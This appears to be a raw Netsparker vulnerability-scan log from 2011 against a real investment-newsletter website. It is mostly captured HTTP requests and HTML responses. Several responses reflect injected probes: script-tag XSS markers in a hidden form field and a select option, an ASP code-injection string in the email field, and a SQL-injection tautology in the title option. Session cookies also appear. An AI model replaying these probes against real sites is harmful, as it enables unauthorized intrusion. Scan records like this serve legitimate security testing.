<tr align="left" valign="top">
<td>&nbsp;</td>
<td><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="http://www.stansberryresearch.com/secure/pwalliance.asp" target="_blank">Private Wealth Alliance</a></font></td>
</tr>
<tr align="left" valign="top">
<td>&nbsp;</td>
<td>&nbsp;</td>
</tr>
</table></td>
<td width="1" bgcolor="#cccccc"><img src="1-1.gif" width="1"
height="1"></td>
<td width="9" align="left" valign="top" bgcolor="#FFFFFF"><div align="left"> </div></td>
<td align="left" valign="top" bgcolor="#FFFFFF"><p>&nbsp;
</p>

<div align="center">
<p align=center class="mid_font"><b><em>Retirement Millionaire</em> Subscribers Only</b></p>
<p align=center class="mid_font">You must have a subscription to access this section.</p>
<p align=center class="mid_font">To Learn more about <em>Retirement Millionaire</em> <a href="http://www.stansberryresearch.com/pro/0902REMSTE99/WREMK623/PR" target = "_blank">click here.</a></p>
<p align=center class="mid_font">If you are already a subscriber, contact customer service at 1-888-261-2693.</p>
<p align=center class="mid_font">Thank you.</p>
<p align=center class="mid_font"><font color=#990000><b><font
color=#666666><br>
</font></b></font></p>
</div>


</td></tr>
</table>
<table cellspacing=0 cellpadding=3 width=800 align=center
bgcolor=#ffffff>
<tbody>
<tr>
<td valign=top align=left height=21><div align=center>
<div align=center>
<div align=left>
<div align=left>
<div align=left>
<div align="center"><font face="Verdana, Arial, Helvetica, sans-serif"
size=2><img src="/secure/images/bottom_border.gif" width="798" height="23"></font></div>
</div>
</div>
</div>
</div>
</div></td>
</tr>
</tbody>
</table>
<table width="800" border="0" align="center" cellpadding="0" cellspacing="0" id="main">
<tr>
<td align="left" valign="top"><font color="#666666" size="1" face="Verdana, Arial, Helvetica, sans-serif">&copy;2011 Stansberry & Associates Investment Research. All Rights Reserved. Protected by copyright laws of the United States and international treaties. This website may only be used pursuant to the subscription agreement and any reproduction, copying, or redistribution (electronic or otherwise, including on the world wide web), in whole or in part, is strictly prohibited without the express written permission of Stansberry & Associates Investment Research, LLC. 1217 Saint Paul Street, Baltimore MD 21202. </font> </td>
</tr>
</table>
<table width="800" align="center" cellpadding="0" cellspacing="0" bgcolor="#FFFFFF" id="main">
<tr>
<td height="21" align="left" valign="top"><div align="center">
<div align="center">
<div align="left">
<div align=left>
<div align=left>
<hr width="800" size="1" noshade>
</div>
</div>
</div>
</div>
</div></td>
</tr>
</table>
<table width="800" align="center" cellpadding="0" cellspacing="0">
<tr>
<td align="left" valign="top"><div align="center">
<p><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="/secure">Home</a> | <a href="/secure/editors.asp">Meet the Editors</a> | <a href="/secure/news.asp">News & Events</a> | <a href="http://www.stansberryresearch.com/pub/psi/free_reports.html" target="_blank">Media & Interviews</a> | <a href="/secure/contact.asp">Contact Us</a> | <a href="/secure/customer_service.asp">Customer Service</a> | <a href="/secure/privacy.asp">Privacy Policy<br>
</a><a href="/secure/schedule.asp">Publishing Schedule</a> | <a href="/secure/digest/">S&amp;A Digest</a> | <a href="http://www.dailywealth.com">DailyWealth</a> | <a href="http://www.growthstockwire.com">Growth Stock Wire</a> | <a href="/secure/archive/">General Archive</a> | <a href="/secure/privacy.asp">Privacy Policy</a><br />
<a href="/secure/privacy.asp"></a><br>
</font></p>
</div></td>
</tr>
</table>
<table width="800" align="center" cellpadding="0" cellspacing="0" bgcolor="#FFFFFF" id="main">
<tr>
<td height="21" align="left" valign="top"><div align="center">
<div align="center">
<div align="left">
<div align=left>
<div align=left>
<hr align="center" width="300" size="1" noshade>
</div>
</div>
</div>
</div>
</div></td>
</tr>
</table>
<table width="800" align="center" cellpadding="0" cellspacing="0" bgcolor="#FFFFFF">
<tr>
<td height="21" align="left" valign="top"><div align="center"><a href="/secure/"><img src="/secure/images/sa_logo.gif" width="198" height="39" border="0"></a> </div></td>
</tr>
</table>
<script type="text/javascript">
var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");
document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));
</script>
<script type="text/javascript">
var pageTracker = _gat._getTracker("UA-235360-4");
pageTracker._initData();
pageTracker._trackPageview();
</script>



</body>
</html>

Identification Response

HTTP/1.1 200 OK
Date: Fri, 04 Nov 2011 05:51:03 GMT
Server: Microsoft-IIS/6.0
P3P: CP="UNI STA NAV COM INT DELi CUR TAI NON COR BUS DSP"
X-Powered-By: ASP.NET
Content-Length: 11905
Content-Type: text/html
Cache-control: private




<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Stansberry & Associates Investment Research</title>
<link rel="stylesheet" href="/includes/css.css" type="text/css" />
</head>

<body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
<SCRIPT LANGUAGE="JavaScript" src="http://oascentral.stansberryresearch.com/Scripts/oas_analytics.js"></SCRIPT>
<script language="JavaScript">
var RN = new String (Math.random());
var RNS = RN.substring (2,11);
var oas_jx_sitepage = "stansberry/cover";
//<!�- Define Custom Reporting Taxonomy, format is: '&Attribute1=Value1&Attribute2=Value2' -->
var OAS_taxonomy='custom=' + oas_jx_sitepage;
var OAS_query='';
OAS_query += 'XE' + '&' + OAS_taxonomy + OAS_rdl + "&if_nt_CookieAccept=" + OAS_CA + '&XE';
// -->
</script>
<table width="800" border="0" align="center" cellpadding="0" cellspacing="0">
<tr>
<td width="427" rowspan="2"><a href="/"><img src="/images/top_logo.gif" alt="Stansberry & Associates Investment Research" width="427" height="103" border="0"></a></td>
<td width="360" height="82" align="right" valign="middle"><a href="http://signups.harborpublishing.com/fsm/signups/signup/538.html" target="_new"><img src="/images/stars_arrow.gif" border="0"></a></td>
<td width="13" align="right" valign="middle">&nbsp;</td>
</tr>
<tr>
<td colspan="2" align="right" valign="bottom"><table width="100%" border="0" align="center" cellpadding="3" cellspacing="0" class="top_font">
<tr>
<td align="right" valign="bottom"><div align="right">Customer Service: 1-888-261-2693 | <a href="/website_overview.asp" target="_blank">Website Overview</a></div></td>
<td width="6" align="right" valign="bottom">&nbsp;</td>
</tr>
</table></td>
</tr>
</table>
<table width="798" border="0" align="center" cellpadding="0" cellspacing="0">
<tr align="left" valign="top">
<td><div align="left"><a href="/"><img src="/images/home_button.gif" alt="Home" width="70" height="38" border="0"></a></div></td>
<td><div align="left"><a href="/editors.asp"><img src="/images/editors_button.gif" alt="Meet The Editors" width="129" height="38" border="0"></a></div></td>
<td><div align="left"><a href="/products.asp"><img src="/images/products_btn.gif" alt="In The News" width="112" height="38" border="0"></a></div></td>
<td><div align="left"><a href="/schedule.asp"><img src="/images/pubsched_button.gif" alt="Investment Research Publishing Schedule" width="155" height="38" border="0"></a></div></td>
<td><div align="left"><a href="/contact.asp"><img src="/images/contact_button_main.gif" alt="Contact Us" width="159" height="38" border="0"></a></div></td>
<td><div align="left"><img src="/images/login_button.gif" alt="Subscriber Login" width="173" height="38" border="0"></div></td>
</tr>
</table><script language="javascript" type="text/javascript">
// <!CDATA[

function Submit1_onclick() {

}

// ]]>
</script>



<table width="800" border="0" align="center" cellpadding="0" cellspacing="0">
<tr>
<td>
<table width="625" border="0" cellpadding="0" cellspacing="0">
<tr>
<td><script language="JavaScript">
<!--
var oas_jx_pos = "Top";
document.write("<scr" + "ipt language=\"JavaScript\" src=\"http://oascentral.stansberryresearch.com/RealMedia/ads/adstream_jx.ads/" +
oas_jx_sitepage + "/1" + RNS + "@" + oas_jx_pos + '?' + OAS_query + "\"></scr" + "ipt>");
// -->
</script></td>
</tr>
</table></td>
<td width="200" align="left" valign="middle"><table width="100%" border="0" cellpadding="5" cellspacing="0">
<tr>
<td><!--<form action="/ICA/Default.aspx" method="post">-->
<!-- <form action="/test1/Default.aspx" method="post">-->
<form action="/ICA/default.aspx" method="post">
<table width="100%" border="0" align="right" cellpadding="2" cellspacing="0" class="top_font">
<tr>
<td >User Name:
<input name="username" type="text" id="username" size="22"></td>
</tr>
<tr>
<td>Password:
<input name="password" type="password" id="password" size="22">
<input name="ref" type="hidden" value="/secure/shr/index/'"--></style></script><script>netsparker(0x0048EC)</script>">
</td>
</tr>
<tr>
<td ><div align="left">
<p><input name="Submit" type="submit" class="top_font" value="Login" id="Submit1" onclick="return Submit1_onclick()">
<a href="/responses/forgot_password.asp">Forgot Password?</a></p>
</div></td>
</tr>
</table>
</form></td>
</tr>
</table></td>
</tr>
</table>
<TABLE id=main cellSpacing=0 cellPadding=3 width=800 align=center
bgColor=#ffffff>
<TBODY>
<TR>
<TD vAlign=top align=left height=21><DIV align=center>
<DIV align=center>
<DIV align=left>
<DIV align=left>
<DIV align=left>
<hr align="center" width="775" size="1" noshade>
<div align="center"><FONT face="Verdana, Arial, Helvetica, sans-serif" size=2></FONT></div>
</DIV>
</DIV>
</DIV>
</DIV>
</DIV></TD>
</TR>
</TBODY>
</TABLE>
<table width="800" border="0" align="center" cellpadding="0" cellspacing="0">
<tr>
<td>
<div align="center"><FONT face="Verdana, Arial, Helvetica, sans-serif" size=2>
<form action="/ICA/ForgotPassword.aspx" id="ForgotPasswordForm" method="post">
<table width="100%">
<tr>
<td align="center">
<table style="margin:20px;margin-bottom:30px;">
<tr>
<td align="center" style="padding:10px;">
<p><b>Forgot Password?</b></p>
</td>
</tr>

<tr>
<td align="center" style="padding:20px;">
Check your e-mail. You should receive your username and password in a few moments. If you don't, please contact customer service at <a href="mailto:info@stansberrycustomerservice.com">info@stansberrycustomerservice.com</a>.
</td>
</tr>

</table>
</td>
</tr>
</table>
</form></font>
</div>



</td>
</tr>
</table>
<TABLE cellSpacing=0 cellPadding=3 width=800 align=center
bgColor=#ffffff>
<TBODY>
<TR>
<TD vAlign=top align=left height=21><DIV align=center>
<DIV align=center>
<DIV align=left>
<DIV align=left>
<DIV align=left>
<div align="center"><FONT face="Verdana, Arial, Helvetica, sans-serif"
size=2><img src="/images/bottom_border.gif" width="798" height="24"></FONT></div>
</DIV>
</DIV>
</DIV>
</DIV>
</DIV></TD>
</TR>
</TBODY>
</TABLE>
<table width="800" border="0" align="center" cellpadding="0" cellspacing="0" id="main">
<tr>
<td align="left" valign="top"><font color="#666666" size="1" face="Verdana, Arial, Helvetica, sans-serif">&copy;2011 Stansberry & Associates Investment Research. All Rights Reserved. Protected by copyright laws of the United States and international treaties. This website may only be used pursuant to the subscription agreement and any reproduction, copying, or redistribution (electronic or otherwise, including on the world wide web), in whole or in part, is strictly prohibited without the express written permission of Stansberry & Associates Investment Research, LLC. 1217 Saint Paul Street, Baltimore MD 21202. </font> </td>
</tr>
</table>
<table width="800" align="center" cellpadding="0" cellspacing="0" bgcolor="#FFFFFF" id="main">
<tr>
<td height="21" align="left" valign="top"><div align="center">
<div align="center">
<div align="left">
<DIV align=left>
<DIV align=left>
<hr width="800" size="1" noshade>
</DIV>
</DIV>
</div>
</div>
</div></td>
</tr>
</table>
<table width="800" align="center" cellpadding="0" cellspacing="0">
<tr>
<td align="left" valign="top"><div align="center">
<p><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="/">Home</a> | <a href="/editors.asp">Meet the Editors</a> | <a href="/news.asp">News & Events</a> | <a href="http://www.stansberryresearch.com/pub/psi/free_reports.html" target="_blank">Media &amp; Interviews</a> | <a href="/schedule.asp">Publishing Schedule</a> | <a href="/contact.asp">Contact Us</a> | <a href="/customer_service.asp">Customer Service</a><a href="/privacy.asp"><br>
</a> <a href="/pub/pal">The S&A Alliance</a> | <a href="/pub/sug">True Wealth Alliance</a> | <a href="/pub/pwa">Private Wealth Alliance</a> <br>
<a href="/pub/digest/">S&amp;A Digest</a> | <a href="http://www.dailywealth.com" target="_blank" title="DailyWealth Investment Newsletter">DailyWealth</a> | <a href="http://www.growthstockwire.com" target="_blank" title="Growth Stock Wire Investment Newsletter">Growth Stock Wire</a> | <a href="http://www.thedailycrux.com/" target="_blank">The Daily Crux<br />
</a></font><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="/privacy.asp">Privacy Policy</a><br>
</font></p>
</div></td>
</tr>
</table>
<table width="800" align="center" cellpadding="0" cellspacing="0" bgcolor="#FFFFFF" id="main">
<tr>
<td height="21" align="left" valign="top"><div align="center">
<div align="center">
<div align="left">
<DIV align=left>
<DIV align=left>
<hr align="center" width="300" size="1" noshade>
</DIV>
</DIV>
</div>
</div>
</div></td>
</tr>
</table>
<table width="800" align="center" cellpadding="0" cellspacing="0" bgcolor="#FFFFFF">
<tr>
<td height="21" align="left" valign="top"><div align="center"><a href="/"><strong><img src="/images/sa_logo.gif" alt="Stansberry & Associates Investment Research" width="198" height="39" border="0"></strong></a></div></td>
</tr>
</table>
<script type="text/javascript">
var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");
document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));
</script>
<script type="text/javascript">
var pageTracker = _gat._getTracker("UA-235360-4");
pageTracker._initData();
pageTracker._trackPageview();
</script>

<!-- Google Code for S&amp;A Remarketing List -->
<script type="text/javascript">
/* <![CDATA[ */
var google_conversion_id = 1068007774;
var google_conversion_language = "en";
var google_conversion_format = "3";
var google_conversion_color = "666666";
var google_conversion_label = "AVdACPaJ0QEQ3oKi_QM";
var google_conversion_value = 0;
/* ]]> */
</script>
<script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js">
</script>
<noscript>
<div style="display:inline;">
<img height="1" width="1" style="border-style:none;" alt="" src="http://www.googleadservices.com/pagead/conversion/1068007774/?label=AVdACPaJ0QEQ3oKi_QM&amp;guid=ON&amp;script=0"/>
</div>
</noscript>
<!-- Advertiser 'Stansberry & Associates', Include user in segment '2011 DWP - Stansberry Retargeting Pixel' - DO NOT MODIFY THIS PIXEL IN ANY WAY -->
<img src="http://ads.bluelithium.com/pixel?id=1539896&t=2" width="1" height="1" />
<!-- End of segment tag -->
</body>
</html>
- /forms/palConference.asp

/forms/palConference.asp CONFIRMED

Injection URL

http://www.stansberryresearch.com/forms/palConference.asp?error=email

Injection Request

GET /forms/palConference.asp?error=email HTTP/1.1
Referer: http://www.stansberryresearch.com/stp_ircs/feedback/pal_registration.asp
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.stansberryresearch.com
Cookie: ASPSESSIONIDQACQTSTA=EFBOLMLBNGIOFLDKGMNCCMDE; EOA+Scribble+Short+%2D+New+Style=EOA+Scribble+Short+%2D+New+Style; ASPSESSIONIDQSTBRQSC=CAHBMFABEKGDDHEMKOHEHOIN; Overseas+0611=Overseas+0611; RDB=c803000000000000002d2d2d2d2d2d2d2d2d2d2d2d2d2d2d00000000000000000000000000
Accept-Encoding: gzip, deflate

Identification Request

GET /forms/palConference.asp?error=email HTTP/1.1
Referer: http://www.stansberryresearch.com/stp_ircs/feedback/pal_registration.asp
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.stansberryresearch.com
Cookie: ASPSESSIONIDQACQTSTA=EFBOLMLBNGIOFLDKGMNCCMDE; EOA+Scribble+Short+%2D+New+Style=EOA+Scribble+Short+%2D+New+Style; ASPSESSIONIDQSTBRQSC=CAHBMFABEKGDDHEMKOHEHOIN; Overseas+0611=Overseas+0611; RDB=c803000000000000002d2d2d2d2d2d2d2d2d2d2d2d2d2d2d00000000000000000000000000
Accept-Encoding: gzip, deflate

Injection Response

HTTP/1.1 200 OK
Date: Fri, 04 Nov 2011 05:52:02 GMT
Server: Microsoft-IIS/6.0
P3P: CP="UNI STA NAV COM INT DELi CUR TAI NON COR BUS DSP"
X-Powered-By: ASP.NET
Content-Length: 20099
Content-Type: text/html
Cache-control: private




<html>
<head>
<title>Stansberry & Associates</title>
<link rel="stylesheet" href="/secure/includes/css.css" type="text/css" />
<script language="JavaScript" src="/forms/includes/javascript/date_validation.js"></script>
<script language="JavaScript" src="/forms/includes/javascript/CalendarPopup.js"></script>
<script language="JavaScript">
var cal = new CalendarPopup();
</script>
<script language="javascript"
type="text/javascript">

function validateForm(pal)
{

if(""==document.forms.pal.firstname.value)
{
alert("Please enter your first name.");
return false;
}
if(""==document.forms.pal.lastname.value)
{
alert("Please enter your last name.");
return false;
}
if(""==document.forms.pal.address1.value)
{
alert("Please enter your address.");
return false;
}
if(""==document.forms.pal.city.value)
{
alert("Please enter city.");
return false;
}
if(""==document.forms.pal.zip.value)
{
alert("Please enter zip code.");
return false;
}
if(""==document.forms.pal.phone.value)
{
alert("Please enter your phone number.");
return false;
}

if(""==document.forms.pal.email.value)
{
alert("Please enter your email address.");
return false;
}
}
</script>




<script language="JavaScript">
function setVisibility(id, visibility) {
document.getElementById(id).style.display = visibility;
}
</script>


</head>
<body bgcolor="#CCCCCC">
<table width="625" border="0" align="center" cellpadding="0" cellspacing="0" bgcolor="#FFFFFF">
<tr>
<td><table width="100%" border="0" align="center" cellpadding="0" cellspacing="0">
<tr>
<td align="left" valign="top"><div align="center"><img src="/secure/images/pal_header.gif" border="0"></div></td>
</tr>
<tr>
<td><table width="600" border="0" align="center" cellpadding="3" cellspacing="0">
<tr><td bgcolor="#999999">&nbsp;
</td>
</tr>
</table>
</td>

</tr>
<tr>
<td>
<table width="600" border="0" align="center" cellpadding="10" cellspacing="0">
<tr>
<td align="center" valign="top" class="mid_font">
<b>2009 Alliance Registration Form</b><br>
<b>Monday, November 9th, 2009</b><br><br>
<b><font color="FF0000">You must register by Friday, August 28<sup>th</sup> to guarantee your spot.</font></b>

<form action="/stp_ircs/feedback/pal_registration.asp" method="post" name="pal" id="pal" onSubmit="return validateForm(pal);">
<table width="100%" border="0" cellpadding="5" cellspacing="0" class="border">
<tr align="left" valign="top" bgcolor="#eeeeee" class="mid_font">
<td colspan="2" class="mid_font"><strong><font size="2">Personal Information </strong></td>
<td width="22%" class="mid_font"><div align="right"><strong><font color="#FF0000" size="1" face="Verdana, Arial, Helvetica, sans-serif">* Required Field</strong></div></td>
</tr>
<tr align="left" valign="top" class="mid_font">
<td width="31%" class="mid_font">

Title:
</td>
<td colspan="2" align="left">

<select name="title" id="title">

<option value="-1 OR 17-7=10">-1 OR 17-7=10</option>

<option value="Dr.">Dr.</option>
<option value="Mr.">Mr.</option>
<option value="Mrs.">Mrs.</option>
<option value="Ms.">Ms.</option>
<option value="Miss.">Miss.</option>
<option value="Pr.">Pr.</option>
<option value="Prof.">Prof.</option>
</select>

</td>
</tr>
<tr align="left" valign="top" class="mid_font">
<td width="31%" class="mid_font">

First name:
<font color="#FF0000">*</font></td>
<td colspan="2" align="left">


<input name="firstname" type="text" id="firstname" size="35" value="Smith">
</td>
</tr>
<tr align="left" valign="top" class="mid_font">
<td class="mid_font">
Last name:
<font color="#FF0000">*</font></td>
<td colspan="2" align="left">

<input name="lastname" type="text" id="lastname" size="35" value="Smith">
</td>
</tr>

<tr align="left" valign="top" class="mid_font">
<td class="mid_font">
Address 1: <font color="#FF0000">*</font>
</td>
<td colspan="2" align="left">
<input name="address1" type="text" id="address1" size="35" value="3">
</td>
</tr>
<tr align="left" valign="top" class="mid_font">
<td class="mid_font">
Address 2:
</td>
<td colspan="2" align="left">
<input name="address2" type="text" id="address2" size="35" value="3">
</td>
</tr>
<tr align="left" valign="top" class="mid_font">
<td class="mid_font">
City:<font color="#FF0000">*</font>
</td>
<td colspan="2" align="left">
<input name="city" type="text" id="city" size="35" value="3">
</td>
</tr>
<tr align="left" valign="top" class="mid_font">
<td class="mid_font">State:
</td>
<td colspan="2" align="left">
<select name="state_" size="1" id="state_">


<option value="3">3</option>


<option value="">----------------------------------------------------</option>
<option value="AA">Armed Forces America</option>
<option value="AE">Armed Forces Europe</option>
<option value="AP">Armed Forces Pacific</option>
<option value="AL">Alabama</option>
<option value="AK">Alaska</option>
<option value="AZ">Arizona</option>
<option value="AR">Arkansas</option>
<option value="CA">California</option>
<option value="CO">Colorado</option>
<option value="CT">Connecticut</option>
<option value="DE">Delaware</option>
<option value="DC">District of Columbia</option>
<option value="FL">Florida</option>
<option value="GA">Georgia</option>
<option value="HI">Hawaii</option>
<option value="ID">Idaho</option>
<option value="IL">Illinois</option>
<option value="IN">Indiana</option>
<option value="IA">Iowa</option>
<option value="KS">Kansas</option>
<option value="KY">Kentucky</option>
<option value="LA">Louisiana</option>
<option value="ME">Maine</option>
<option value="MD">Maryland</option>
<option value="MA">Massachusetts</option>
<option value="MI">Michigan</option>
<option value="MN">Minnesota</option>
<option value="MS">Mississippi</option>
<option value="MO">Missouri</option>
<option value="MT">Montana</option>
<option value="NE">Nebraska</option>
<option value="NV">Nevada</option>
<option value="NH">New Hampshire</option>
<option value="NJ">New Jersey</option>
<option value="NM">New Mexico</option>
<option value="NY">New York</option>
<option value="NC">North Carolina</option>
<option value="ND">North Dakota</option>
<option value="OH">Ohio</option>
<option value="OK">Oklahoma</option>
<option value="OR">Oregon</option>
<option value="PA">Pennsylvania</option>
<option value="RI">Rhode Island</option>
<option value="SC">South Carolina</option>
<option value="SD">South Dakota</option>
<option value="TN">Tennessee</option>
<option value="TX">Texas</option>
<option value="UT">Utah</option>
<option value="VT">Vermont</option>
<option value="VI">Virgin Islands</option>
<option value="VA">Virginia</option>
<option value="WA">Washington</option>
<option value="WV">West Virginia</option>
<option value="WI">Wisconsin</option>
<option value="WY">Wyoming</option>
<option value="PR">Puerto Rico</option>
<option value="GU">Guam</option>
</select></td>
</tr>
<tr align="left" valign="top" class="mid_font">
<td class="mid_font">
Zip Code: <font color="#FF0000">*</font>
</td>
<td colspan="2" align="left">
<input name="zip" type="text" id="zip" size="35" value="3">
</td>
</tr>
<tr align="left" valign="top" class="mid_font">
<td class="mid_font">
Country:
</td>
<td colspan="2" align="left">
<input name="country" type="text" id="country" size="35" value="3">
</td>
</tr>

<tr align="left" valign="top" class="mid_font">
<td class="mid_font">
Phone Number: <font color="#FF0000">*</font></td>
<td colspan="2" align="left">
<input name="phone" type="text" id="phone" size="35" value="3">
</td>
</tr>
<tr align="left" valign="top" class="mid_font">
<td class="mid_font">
E-mail address: <font color="#FF0000">*</font></td>
<td colspan="2" align="left">

<input name="email" type="text" id="email" size="35" value="<% response.write(268409241-22) %>">
</td>
</tr>

<tr align="left" valign="top" class="mid_font">
<td class="mid_font"><font color="#FF0000">EMAIL DOES NOT MATCH<br>
Retype E-mail address:*</font></td>
<td colspan="2" align="left">
<font color="#FF0000">
<input name="reEmail" type="text" id="reEmail" size="35"> &nbsp;&nbsp;&nbsp;&nbsp;<b><<</b></font>
</td>
</tr>


<tr align="left" valign="top" class="mid_font">
<td colspan="3" class="mid_font">
Would you prefer to be contacted by e-mail or phone?


<input name="contact" type="radio" value="e-mail">
E-mail
<input name="contact" type="radio" value="phone"checked>
Phone <br><br>
</td>
</tr>


<tr align="left" valign="top" bgcolor="#eeeeee" class="mid_font">
<td colspan="3" class="mid_font"><strong>Guest Information </strong></td>
</tr>
<tr align="left" valign="top" class="mid_font">
<td class="mid_font">
Guest First name:
</td>
<td colspan="2" align="left">


<input name="gfirstname" type="text" id="gfirstname" size="35" value="Smith">
</td>
</tr>
<tr align="left" valign="top" class="mid_font">
<td class="mid_font">
Guest Last name:
</td>
<t..

Identification Response

HTTP/1.1 200 OK
Date: Fri, 04 Nov 2011 05:52:02 GMT
Server: Microsoft-IIS/6.0
P3P: CP="UNI STA NAV COM INT DELi CUR TAI NON COR BUS DSP"
X-Powered-By: ASP.NET
Content-Length: 20193
Content-Type: text/html
Cache-control: private




<html>
<head>
<title>Stansberry & Associates</title>
<link rel="stylesheet" href="/secure/includes/css.css" type="text/css" />
<script language="JavaScript" src="/forms/includes/javascript/date_validation.js"></script>
<script language="JavaScript" src="/forms/includes/javascript/CalendarPopup.js"></script>
<script language="JavaScript">
var cal = new CalendarPopup();
</script>
<script language="javascript"
type="text/javascript">

function validateForm(pal)
{

if(""==document.forms.pal.firstname.value)
{
alert("Please enter your first name.");
return false;
}
if(""==document.forms.pal.lastname.value)
{
alert("Please enter your last name.");
return false;
}
if(""==document.forms.pal.address1.value)
{
alert("Please enter your address.");
return false;
}
if(""==document.forms.pal.city.value)
{
alert("Please enter city.");
return false;
}
if(""==document.forms.pal.zip.value)
{
alert("Please enter zip code.");
return false;
}
if(""==document.forms.pal.phone.value)
{
alert("Please enter your phone number.");
return false;
}

if(""==document.forms.pal.email.value)
{
alert("Please enter your email address.");
return false;
}
}
</script>




<script language="JavaScript">
function setVisibility(id, visibility) {
document.getElementById(id).style.display = visibility;
}
</script>


</head>
<body bgcolor="#CCCCCC">
<table width="625" border="0" align="center" cellpadding="0" cellspacing="0" bgcolor="#FFFFFF">
<tr>
<td><table width="100%" border="0" align="center" cellpadding="0" cellspacing="0">
<tr>
<td align="left" valign="top"><div align="center"><img src="/secure/images/pal_header.gif" border="0"></div></td>
</tr>
<tr>
<td><table width="600" border="0" align="center" cellpadding="3" cellspacing="0">
<tr><td bgcolor="#999999">&nbsp;
</td>
</tr>
</table>
</td>

</tr>
<tr>
<td>
<table width="600" border="0" align="center" cellpadding="10" cellspacing="0">
<tr>
<td align="center" valign="top" class="mid_font">
<b>2009 Alliance Registration Form</b><br>
<b>Monday, November 9th, 2009</b><br><br>
<b><font color="FF0000">You must register by Friday, August 28<sup>th</sup> to guarantee your spot.</font></b>

<form action="/stp_ircs/feedback/pal_registration.asp" method="post" name="pal" id="pal" onSubmit="return validateForm(pal);">
<table width="100%" border="0" cellpadding="5" cellspacing="0" class="border">
<tr align="left" valign="top" bgcolor="#eeeeee" class="mid_font">
<td colspan="2" class="mid_font"><strong><font size="2">Personal Information </strong></td>
<td width="22%" class="mid_font"><div align="right"><strong><font color="#FF0000" size="1" face="Verdana, Arial, Helvetica, sans-serif">* Required Field</strong></div></td>
</tr>
<tr align="left" valign="top" class="mid_font">
<td width="31%" class="mid_font">

Title:
</td>
<td colspan="2" align="left">

<select name="title" id="title">

<option value="''"--></style></script><script>netsparker(0x00514F)</script>">''"--></style></script><script>netsparker(0x00514F)</script></option>

<option value="Dr.">Dr.</option>
<option value="Mr.">Mr.</option>
<option value="Mrs.">Mrs.</option>
<option value="Ms.">Ms.</option>
<option value="Miss.">Miss.</option>
<option value="Pr.">Pr.</option>
<option value="Prof.">Prof.</option>
</select>

</td>
</tr>
<tr align="left" valign="top" class="mid_font">
<td width="31%" class="mid_font">

First name:
<font color="#FF0000">*</font></td>
<td colspan="2" align="left">


<input name="firstname" type="text" id="firstname" size="35" value="Smith">
</td>
</tr>
<tr align="left" valign="top" class="mid_font">
<td class="mid_font">
Last name:
<font color="#FF0000">*</font></td>
<td colspan="2" align="left">

<input name="lastname" type="text" id="lastname" size="35" value="Smith">
</td>
</tr>

<tr align="left" valign="top" class="mid_font">
<td class="mid_font">
Address 1: <font color="#FF0000">*</font>
</td>
<td colspan="2" align="left">
<input name="address1" type="text" id="address1" size="35" value="3">
</td>
</tr>
<tr align="left" valign="top" class="mid_font">
<td class="mid_font">
Address 2:
</td>
<td colspan="2" align="left">
<input name="address2" type="text" id="address2" size="35" value="3">
</td>
</tr>
<tr align="left" valign="top" class="mid_font">
<td class="mid_font">
City:<font color="#FF0000">*</font>
</td>
<td colspan="2" align="left">
<input name="city" type="text" id="city" size="35" value="3">
</td>
</tr>
<tr align="left" valign="top" class="mid_font">
<td class="mid_font">State:
</td>
<td colspan="2" align="left">
<select name="state_" size="1" id="state_">


<option value="3">3</option>


<option value="">----------------------------------------------------</option>
<option value="AA">Armed Forces America</option>
<option value="AE">Armed Forces Europe</option>
<option value="AP">Armed Forces Pacific</option>
<option value="AL">Alabama</option>
<option value="AK">Alaska</option>
<option value="AZ">Arizona</option>
<option value="AR">Arkansas</option>
<option value="CA">California</option>
<option value="CO">Colorado</option>
<option value="CT">Connecticut</option>
<option value="DE">Delaware</option>
<option value="DC">District of Columbia</option>
<option value="FL">Florida</option>
<option value="GA">Georgia</option>
<option value="HI">Hawaii</option>
<option value="ID">Idaho</option>
<option value="IL">Illinois</option>
<option value="IN">Indiana</option>
<option value="IA">Iowa</option>
<option value="KS">Kansas</option>
<option value="KY">Kentucky</option>
<option value="LA">Louisiana</option>
<option value="ME">Maine</option>
<option value="MD">Maryland</option>
<option value="MA">Massachusetts</option>
<option value="MI">Michigan</option>
<option value="MN">Minnesota</option>
<option value="MS">Mississippi</option>
<option value="MO">Missouri</option>
<option value="MT">Montana</option>
<option value="NE">Nebraska</option>
<option value="NV">Nevada</option>
<option value="NH">New Hampshire</option>
<option value="NJ">New Jersey</option>
<option value="NM">New Mexico</option>
<option value="NY">New York</option>
<option value="NC">North Carolina</option>
<option value="ND">North Dakota</option>
<option value="OH">Ohio</option>
<option value="OK">Oklahoma</option>
<option value="OR">Oregon</option>
<option value="PA">Pennsylvania</option>
<option value="RI">Rhode Island</option>
<option value="SC">South Carolina</option>
<option value="SD">South Dakota</option>
<option value="TN">Tennessee</option>
<option value="TX">Texas</option>
<option value="UT">Utah</option>
<option value="VT">Vermont</option>
<option value="VI">Virgin Islands</option>
<option value="VA">Virginia</option>
<option value="WA">Washington</option>
<option value="WV">West Virginia</option>
<option value="WI">Wisconsin</option>
<option value="WY">Wyoming</option>
<option value="PR">Puerto Rico</option>
<option value="GU">Guam</option>
</select></td>
</tr>
<tr align="left" valign="top" class="mid_font">
